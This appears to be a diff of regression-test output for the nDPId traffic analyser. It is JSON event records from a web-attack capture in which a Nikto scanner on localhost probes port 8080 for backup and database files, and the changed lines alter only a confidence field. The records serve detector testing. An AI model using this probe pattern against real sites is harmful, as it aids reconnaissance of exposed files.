+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276917,"pkt":"AAAAAAAAAAAAAAAACABFAADDZ9VAAEAG1F1\/AAABfwAAAcLGH5AZz1+f4E8iK4AYAED+twAAAQEICp1m+92dZvvdR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276919,"pkt":"AAAAAAAAAAAAAAAACABFAADDxTFAAEAGdwF\/AAABfwAAAcLIH5D+g\/1jHP616oAYAED+twAAAQEICp1m+9+dZvveR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276920,"pkt":"AAAAAAAAAAAAAAAACABFAADFpeFAAEAGlk9\/AAABfwAAAcLKH5AnGp2SsuR1gYAYAED+uQAAAQEICp1m++CdZvvgR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276922,"pkt":"AAAAAAAAAAAAAAAACABFAADFIE9AAEAGG+J\/AAABfwAAAcLMH5CC7hgEsmCzLIAYAED+uQAAAQEICp1m++KdZvviR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276924,"pkt":"AAAAAAAAAAAAAAAACABFAADFRxNAAEAG9R1\/AAABfwAAAcLOH5BdCH9f1fkuqIAYAED+uQAAAQEICp1m++SdZvvjR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276925,"pkt":"AAAAAAAAAAAAAAAACABFAADFQzdAAEAG+Pl\/AAABfwAAAcLQH5BEXHt7s07ta4AYAED+uQAAAQEICp1m++WdZvvlR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276926,"pkt":"AAAAAAAAAAAAAAAACABFAADIWd1AAEAG4lB\/AAABfwAAAcLSH5AL0mGV2bYy0oAYAED+vAAAAQEICp1m++adZvvmR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276928,"pkt":"AAAAAAAAAAAAAAAACABFAADIwcZAAEAGemd\/AAABfwAAAcLUH5BvVfmVJOeoY4AYAED+vAAAAQEICp1m++idZvvoR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 